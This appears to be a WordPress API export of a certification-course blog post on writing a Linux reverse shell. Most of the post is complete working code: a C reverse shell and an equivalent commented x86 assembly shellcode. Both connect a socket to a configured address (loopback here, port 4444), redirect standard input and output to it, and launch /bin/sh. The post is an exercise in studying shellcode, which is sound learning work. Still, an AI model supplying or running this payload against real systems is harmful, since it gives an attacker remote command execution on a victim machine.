{"id":261,"date":"2020-08-24T00:00:17","date_gmt":"2020-08-24T00:00:17","guid":{"rendered":"https:\/\/badbit.vc\/?p=261"},"modified":"2020-09-02T20:21:01","modified_gmt":"2020-09-02T20:21:01","slug":"writing-a-reverse-shell-in-x86-assembly-language","status":"publish","type":"post","link":"https:\/\/badbit.vc\/index.php\/2020\/08\/24\/writing-a-reverse-shell-in-x86-assembly-language\/","title":{"rendered":"Writing a Reverse Shell in x86 Assembly Language"},"content":{"rendered":"\n<p>A reverse shell is a connection established from the victim&#8217;s system to the attacker-controlled system over a specific port. The major difference between a bind shell and a reverse shell lies in the direction of the connection.<\/p>\n\n\n\n<p>In this blog post, we will create a reverse shell leveraging the ASM code from the <a href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/22\/writing-a-linux-bind-shell-in-asm-x86\/\">previous post<\/a>.<\/p>\n\n\n\n<p>Following is a simple reverse shell in C:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#include &lt;stdio.h>\n#include &lt;sys\/socket.h>\n#include &lt;sys\/types.h>\n#include &lt;netinet\/in.h>\n#include &lt;arpa\/inet.h> \/\/ inet_addr()\n#include &lt;unistd.h>\n\n#define remote_addr \"127.0.0.1\" \/\/ IP address to connect back to\n#define remote_port 4444  \/\/ Port to connect back to\n\nint socket_d;\nstruct sockaddr_in sockstruct;\n\nint main()\n{\n\n\t\/\/ socket_d = socket(domain, type, protocol); 6 = IPPROTO_TCP\n\tsocket_d = socket(AF_INET, SOCK_STREAM, 6);\n\n\tsockstruct.sin_family = AF_INET;\n\tsockstruct.sin_port = htons(remote_port);\n\tsockstruct.sin_addr.s_addr = inet_addr(remote_addr);\n\n\tconnect(socket_d, (struct sockaddr*) &amp;sockstruct, sizeof(sockstruct));\n\n\t\/\/ Unlike the bind shell there is no listen() or accept():\n\t\/\/ the connecting socket itself is used for I\/O\n\n\tdup2(socket_d, 0); \/\/ STDIN\n\tdup2(socket_d, 1); \/\/ STDOUT\n\tdup2(socket_d, 2); \/\/ STDERR\n\n\texecve(\"\/bin\/sh\", NULL, NULL);\n\tclose(socket_d);\n\n    return 
0;\n}\n<\/code><\/pre>\n\n\n\n<p>The above code, once compiled and executed, will connect back to localhost on port 4444 as seen below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-1024x340.jpg\" alt=\"\" class=\"wp-image-262\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-1024x340.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-300x100.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-768x255.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-1536x510.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1-850x282.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_150914-1.jpg 1768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Following the same approach as in the previous post, where we described a bind shell, we write an ASM equivalent of the above reverse shell.<br>Below is the commented x86-ASM code.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>; Syscalls - cat \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h\n; Call numbers for socketcall -- \/usr\/include\/linux\/net.h\n\nglobal _start\n\nsection .text\n_start:\n\nsock:\n\t; socket(AF_INET, SOCK_STREAM, 0) via socketcall(SYS_SOCKET, args)\n\n\txor eax, eax\n\txor ebx, ebx\n\txor ecx, ecx\n\n\tmov bl, 0x1 ; SYS_SOCKET\n\n\tpush ecx ; protocol = 0\n\tpush ebx ; type = SOCK_STREAM (1)\n\tpush 0x2 ; domain = AF_INET\n\tmov ecx, esp ; ecx -> argument array\n\n\tmov al, 0x66 ; socketcall\n\tint 0x80\n\n\tmov esi, eax ; Saving socket for further use\n\n\t; connect(socket_d, (struct sockaddr*) &amp;sockstruct, sizeof(sockstruct))\n\n\tmov al, 0x66 ; socketcall\n\n\t; building the sockaddr_in structure on the stack\n\n\txor ebx, ebx\n\n\tpush 0x0101017f ; IP address 127.1.1.1 (loopback range; 127.0.0.1 would contain null bytes)\n\tpush word 0x5c11 ; Port 4444 in network byte order\n\tpush word 0x2 ; 
AF_INET\n\n\tmov ecx, esp ; ecx -> sockaddr_in\n\n\tpush 0x10 ; Size of sockstruct\n\tpush ecx ; Sockstruct from stack\n\tpush esi ; Earlier saved socket\n\n\tmov ecx, esp ; ecx -> argument array\n\n\tmov bl, 0x3 ; SYS_CONNECT\n\tint 0x80\n\n\t; redirecting stdin, stdout and stderr to our socket:\n\t; dup2(sock, 2), dup2(sock, 1), dup2(sock, 0)\n\n\tmov ebx, esi\n\tmov ecx, 0x3\n\npipe:\n\n\tmov al, 0x3f ; dup2\n\tdec ecx\n\tint 0x80\n\n\tinc ecx\n\tloop pipe\n\n\t; execve(\"\/bin\/\/sh\", NULL, NULL)\n\n\txor ecx, ecx ; argv = NULL\n\tmov edx, ecx ; envp = NULL\n\t\n\t; Null terminated \/bin\/\/sh in Little Endian format\n\tpush ecx\n\tpush 0x68732f2f ; \"\/\/sh\"\n\tpush 0x6e69622f ; \"\/bin\"\n\tmov ebx, esp\n\n\tmov al, 0xb ; execve\n\tint 0x80\n\n\t; Exit\n\n\txor eax, eax\n\tmov al, 0x1\n\tint 0x80\n<\/code><\/pre>\n\n\n\n<p>We compile and link our shellcode, set up our netcat listener on port 4444, and execute our reverse shell.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"323\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-1024x323.jpg\" alt=\"\" class=\"wp-image-264\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-1024x323.jpg 1024w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-300x94.jpg 300w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-768x242.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-1536x484.jpg 1536w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1-850x268.jpg 850w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/Screenshot_20200828_181656-1.jpg 1759w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>And that&#8217;s it folks! 
We have a reverse shell up and running!<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<br><a href=\"http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/\">http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n<p>Student ID: PA-14690<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/bad-bit\/SLAE_x86\/tree\/master\/Reverse%20Shell\">Reverse shell Github Repo<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A reverse shell is a connection established from the victim&#8217;s system to the attacker controlled system over a specific port. The major difference between a bind shell and a reverse shell lies in the flow of connection. In this blog post, we will create a reverse shell leveraging the ASM code from the previous post&#8230;.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-261","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=261"}],"version-history":[{"count":7,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions"}],"predecessor-version":[{"id":324,"href":
"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions\/324"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}